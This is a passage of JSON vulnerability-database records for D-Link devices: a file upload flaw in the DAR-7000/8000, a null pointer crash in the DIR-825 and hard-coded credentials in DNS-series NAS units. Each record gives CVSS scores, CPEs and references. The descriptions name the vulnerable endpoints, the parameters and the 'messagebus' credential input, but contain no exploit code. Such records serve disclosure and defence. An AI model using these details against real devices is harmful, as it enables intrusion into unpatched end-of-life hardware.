"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-202309-0939",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "dar-7000",
"scope": "lte",
"trust": 1.0,
"vendor": "dlink",
"version": "20151231"
},
{
"model": "dar-8000",
"scope": "lte",
"trust": 1.0,
"vendor": "dlink",
"version": "20151231"
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2023-5145"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:dlink:dar-7000_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndIncluding": "20151231",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:dlink:dar-7000:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:dlink:dar-8000_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndIncluding": "20151231",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:dlink:dar-8000:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2023-5145"
}
]
},
"cve": "CVE-2023-5145",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"author": "cna@vuldb.com",
"availabilityImpact": "PARTIAL",
"baseScore": 6.5,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 8.0,
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "MEDIUM",
"trust": 1.0,
"userInteractionRequired": false,
"vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "cna@vuldb.com",
"availabilityImpact": "LOW",
"baseScore": 6.3,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"exploitabilityScore": 2.8,
"impactScore": 3.4,
"integrityImpact": "LOW",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L",
"version": "3.1"
},
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "NVD",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 2.8,
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
}
],
"severity": [
{
"author": "cna@vuldb.com",
"id": "CVE-2023-5145",
"trust": 1.0,
"value": "MEDIUM"
},
{
"author": "NVD",
"id": "CVE-2023-5145",
"trust": 1.0,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2023-5145"
},
{
"db": "NVD",
"id": "CVE-2023-5145"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "** UNSUPPORTED WHEN ASSIGNED ** A vulnerability has been found in D-Link DAR-7000 up to 20151231 and classified as critical. Affected by this vulnerability is an unknown functionality of the file /sysmanage/licence.php. The manipulation of the argument file_upload leads to unrestricted upload. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-240241 was assigned to this vulnerability. NOTE: This vulnerability only affects products that are no longer supported by the maintainer. NOTE: Vendor was contacted early and confirmed immediately that the product is end-of-life. It should be retired and replaced",
"sources": [
{
"db": "NVD",
"id": "CVE-2023-5145"
},
{
"db": "VULMON",
"id": "CVE-2023-5145"
}
],
"trust": 0.99
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "VULDB",
"id": "240241",
"trust": 1.1
},
{
"db": "DLINK",
"id": "SAP10354",
"trust": 1.1
},
{
"db": "NVD",
"id": "CVE-2023-5145",
"trust": 1.1
},
{
"db": "VULMON",
"id": "CVE-2023-5145",
"trust": 0.1
}
],
"sources": [
{
"db": "VULMON",
"id": "CVE-2023-5145"
},
{
"db": "NVD",
"id": "CVE-2023-5145"
}
]
},
"id": "VAR-202309-0939",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VARIoT devices database",
"id": null
}
],
"trust": 1.0
},
"last_update_date": "2024-06-06T19:22:15.323000Z",
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-434",
"trust": 1.0
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2023-5145"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 1.1,
"url": "https://vuldb.com/?id.240241"
},
{
"trust": 1.1,
"url": "https://vuldb.com/?ctiid.240241"
},
{
"trust": 1.1,
"url": "https://github.com/llixixi/cve/blob/main/d-link-dar-7000_upload_%20licence.md"
},
{
"trust": 1.1,
"url": "https://supportannouncement.us.dlink.com/announcement/publication.aspx?name=sap10354"
},
{
"trust": 0.1,
"url": "https://cwe.mitre.org/data/definitions/434.html"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov"
}
],
"sources": [
{
"db": "VULMON",
"id": "CVE-2023-5145"
},
{
"db": "NVD",
"id": "CVE-2023-5145"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "VULMON",
"id": "CVE-2023-5145"
},
{
"db": "NVD",
"id": "CVE-2023-5145"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2023-09-25T00:00:00",
"db": "VULMON",
"id": "CVE-2023-5145"
},
{
"date": "2023-09-25T00:15:10.217000",
"db": "NVD",
"id": "CVE-2023-5145"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2023-09-25T00:00:00",
"db": "VULMON",
"id": "CVE-2023-5145"
},
{
"date": "2024-06-05T21:15:13.860000",
"db": "NVD",
"id": "CVE-2023-5145"
}
]
}
}
VAR-202108-0937
Vulnerability from variot - Updated: 2024-06-05 23:20
Null Pointer Dereference vulnerability in D-Link DIR-825 2.10b02, which could let a remote malicious user cause a denial of service. The vulnerability could be triggered by sending an HTTP request with URL /vct_wan; the sbin/httpd would invoke the strchr function and take NULL as a first argument, which finally leads to the segmentation fault. NOTE: The DIR-825 and all hardware revisions are considered End of Life and as such this issue will not be patched. ** Not supported ** This is a vulnerability in an unsupported product. D-Link DIR-825 contains a NULL pointer dereference vulnerability. Service operation may be interrupted (DoS). D-Link DIR-825 is a router made by D-Link in Taiwan.
{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-202108-0937",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "dir-825",
"scope": "eq",
"trust": 1.0,
"vendor": "dlink",
"version": "2.10b02"
},
{
"model": "dir-825",
"scope": "eq",
"trust": 0.8,
"vendor": "d link",
"version": "dir-825 firmware 2.10b02"
},
{
"model": "dir-825",
"scope": "eq",
"trust": 0.8,
"vendor": "d link",
"version": null
},
{
"model": "dir-825 2.10b02",
"scope": null,
"trust": 0.6,
"vendor": "d link",
"version": null
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2021-94844"
},
{
"db": "JVNDB",
"id": "JVNDB-2021-010701"
},
{
"db": "NVD",
"id": "CVE-2021-29296"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:dlink:dir-825_firmware:2.10b02:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:dlink:dir-825:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2021-29296"
}
]
},
"cve": "CVE-2021-29296",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "PARTIAL",
"baseScore": 5.0,
"confidentialityImpact": "NONE",
"exploitabilityScore": 10.0,
"impactScore": 2.9,
"integrityImpact": "NONE",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "MEDIUM",
"trust": 1.0,
"userInteractionRequired": false,
"vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Low",
"accessVector": "Network",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "Partial",
"baseScore": 5.0,
"confidentialityImpact": "None",
"exploitabilityScore": null,
"id": "CVE-2021-29296",
"impactScore": null,
"integrityImpact": "None",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "Medium",
"trust": 0.9,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "PARTIAL",
"baseScore": 5.0,
"confidentialityImpact": "NONE",
"exploitabilityScore": 10.0,
"id": "CNVD-2021-94844",
"impactScore": 2.9,
"integrityImpact": "NONE",
"severity": "MEDIUM",
"trust": 0.6,
"vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "NVD",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"exploitabilityScore": 3.9,
"impactScore": 3.6,
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "High",
"baseScore": 7.5,
"baseSeverity": "High",
"confidentialityImpact": "None",
"exploitabilityScore": null,
"id": "CVE-2021-29296",
"impactScore": null,
"integrityImpact": "None",
"privilegesRequired": "None",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "NVD",
"id": "CVE-2021-29296",
"trust": 1.8,
"value": "HIGH"
},
{
"author": "CNVD",
"id": "CNVD-2021-94844",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "CNNVD",
"id": "CNNVD-202108-1027",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "VULMON",
"id": "CVE-2021-29296",
"trust": 0.1,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2021-94844"
},
{
"db": "VULMON",
"id": "CVE-2021-29296"
},
{
"db": "JVNDB",
"id": "JVNDB-2021-010701"
},
{
"db": "CNNVD",
"id": "CNNVD-202108-1027"
},
{
"db": "NVD",
"id": "CVE-2021-29296"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Null Pointer Dereference vulnerability in D-Link DIR-825 2.10b02, which could let a remote malicious user cause a denial of service. The vulnerability could be triggered by sending an HTTP request with URL /vct_wan; the sbin/httpd would invoke the strchr function and take NULL as a first argument, which finally leads to the segmentation fault. NOTE: The DIR-825 and all hardware revisions is considered End of Life and as such this issue will not be patched. ** Not supported ** This is a vulnerability in an unsupported product. D-Link DIR-825 for, NULL There is a vulnerability in pointer dereference.Service operation interruption (DoS) It may be in a state. D-Link DIR-825 is a router made by D-Link in Taiwan",
"sources": [
{
"db": "NVD",
"id": "CVE-2021-29296"
},
{
"db": "JVNDB",
"id": "JVNDB-2021-010701"
},
{
"db": "CNVD",
"id": "CNVD-2021-94844"
},
{
"db": "VULMON",
"id": "CVE-2021-29296"
}
],
"trust": 2.25
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2021-29296",
"trust": 3.9
},
{
"db": "DLINK",
"id": "SAP10212",
"trust": 1.7
},
{
"db": "JVNDB",
"id": "JVNDB-2021-010701",
"trust": 0.8
},
{
"db": "CNVD",
"id": "CNVD-2021-94844",
"trust": 0.6
},
{
"db": "CNNVD",
"id": "CNNVD-202108-1027",
"trust": 0.6
},
{
"db": "VULMON",
"id": "CVE-2021-29296",
"trust": 0.1
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2021-94844"
},
{
"db": "VULMON",
"id": "CVE-2021-29296"
},
{
"db": "JVNDB",
"id": "JVNDB-2021-010701"
},
{
"db": "CNNVD",
"id": "CNNVD-202108-1027"
},
{
"db": "NVD",
"id": "CVE-2021-29296"
}
]
},
"id": "VAR-202108-0937",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2021-94844"
}
],
"trust": 1.0733768399999999
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2021-94844"
}
]
},
"last_update_date": "2024-06-05T23:20:20.327000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "",
"trust": 0.8,
"url": "https://www.dlink.com/en/security-bulletin"
},
{
"title": "Patch for D-Link DIR-825 Null Pointer Dereference Vulnerability",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchinfo/show/302926"
},
{
"title": "D-Link DIR-825 Security vulnerabilities",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=159403"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2021-94844"
},
{
"db": "JVNDB",
"id": "JVNDB-2021-010701"
},
{
"db": "CNNVD",
"id": "CNNVD-202108-1027"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-476",
"trust": 1.0
},
{
"problemtype": "NULL Pointer dereference (CWE-476) [NVD evaluation ]",
"trust": 0.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2021-010701"
},
{
"db": "NVD",
"id": "CVE-2021-29296"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 1.7,
"url": "https://www.dlink.com/en/security-bulletin/"
},
{
"trust": 1.7,
"url": "https://supportannouncement.us.dlink.com/announcement/publication.aspx?name=sap10212"
},
{
"trust": 1.4,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-29296"
},
{
"trust": 0.1,
"url": "https://cwe.mitre.org/data/definitions/476.html"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2021-94844"
},
{
"db": "VULMON",
"id": "CVE-2021-29296"
},
{
"db": "JVNDB",
"id": "JVNDB-2021-010701"
},
{
"db": "CNNVD",
"id": "CNNVD-202108-1027"
},
{
"db": "NVD",
"id": "CVE-2021-29296"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2021-94844"
},
{
"db": "VULMON",
"id": "CVE-2021-29296"
},
{
"db": "JVNDB",
"id": "JVNDB-2021-010701"
},
{
"db": "CNNVD",
"id": "CNNVD-202108-1027"
},
{
"db": "NVD",
"id": "CVE-2021-29296"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2021-12-07T00:00:00",
"db": "CNVD",
"id": "CNVD-2021-94844"
},
{
"date": "2021-08-10T00:00:00",
"db": "VULMON",
"id": "CVE-2021-29296"
},
{
"date": "2022-07-07T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2021-010701"
},
{
"date": "2021-08-10T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202108-1027"
},
{
"date": "2021-08-10T20:15:08.530000",
"db": "NVD",
"id": "CVE-2021-29296"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2021-12-07T00:00:00",
"db": "CNVD",
"id": "CNVD-2021-94844"
},
{
"date": "2021-08-17T00:00:00",
"db": "VULMON",
"id": "CVE-2021-29296"
},
{
"date": "2022-07-07T02:35:00",
"db": "JVNDB",
"id": "JVNDB-2021-010701"
},
{
"date": "2021-08-18T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202108-1027"
},
{
"date": "2024-06-04T19:17:04.097000",
"db": "NVD",
"id": "CVE-2021-29296"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202108-1027"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "D-Link\u00a0DIR-825\u00a0 In \u00a0NULL\u00a0 Pointer dereference vulnerability",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2021-010701"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "code problem",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202108-1027"
}
],
"trust": 0.6
}
}
VAR-202404-0069
Vulnerability from variot - Updated: 2024-06-05 23:17
** UNSUPPORTED WHEN ASSIGNED ** A vulnerability, which was classified as very critical, has been found in D-Link DNS-320L, DNS-325, DNS-327L and DNS-340L up to 20240403. This issue affects some unknown processing of the file /cgi-bin/nas_sharing.cgi of the component HTTP GET Request Handler. The manipulation of the argument user with the input messagebus leads to hard-coded credentials. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-259283. NOTE: This vulnerability only affects products that are no longer supported by the maintainer. NOTE: Vendor was contacted early and confirmed immediately that the product is end-of-life. It should be retired and replaced. Multiple D-Link Systems, Inc. products, including D-Link DNS-320L firmware, dns-120 firmware and dnr-202l firmware, contain a vulnerability related to the use of hard-coded credentials. Information may be obtained or tampered with, and service operation may be interrupted (DoS).
{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-202404-0069",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "dns-320l",
"scope": "eq",
"trust": 1.0,
"vendor": "dlink",
"version": null
},
{
"model": "dnr-202l",
"scope": "eq",
"trust": 1.0,
"vendor": "dlink",
"version": null
},
{
"model": "dns-327l",
"scope": "eq",
"trust": 1.0,
"vendor": "dlink",
"version": null
},
{
"model": "dns-1550-04",
"scope": "eq",
"trust": 1.0,
"vendor": "dlink",
"version": null
},
{
"model": "dns-1200-05",
"scope": "eq",
"trust": 1.0,
"vendor": "dlink",
"version": null
},
{
"model": "dns-340l",
"scope": "eq",
"trust": 1.0,
"vendor": "dlink",
"version": null
},
{
"model": "dns-320lw",
"scope": "eq",
"trust": 1.0,
"vendor": "dlink",
"version": null
},
{
"model": "dns-326",
"scope": "eq",
"trust": 1.0,
"vendor": "dlink",
"version": null
},
{
"model": "dnr-326",
"scope": "eq",
"trust": 1.0,
"vendor": "dlink",
"version": null
},
{
"model": "dnr-322l",
"scope": "eq",
"trust": 1.0,
"vendor": "dlink",
"version": null
},
{
"model": "dns-345",
"scope": "eq",
"trust": 1.0,
"vendor": "dlink",
"version": null
},
{
"model": "dns-321",
"scope": "eq",
"trust": 1.0,
"vendor": "dlink",
"version": null
},
{
"model": "dns-1100-4",
"scope": "eq",
"trust": 1.0,
"vendor": "dlink",
"version": null
},
{
"model": "dns-726-4",
"scope": "eq",
"trust": 1.0,
"vendor": "dlink",
"version": null
},
{
"model": "dns-323",
"scope": "eq",
"trust": 1.0,
"vendor": "dlink",
"version": null
},
{
"model": "dns-120",
"scope": "eq",
"trust": 1.0,
"vendor": "dlink",
"version": null
},
{
"model": "dns-320",
"scope": "eq",
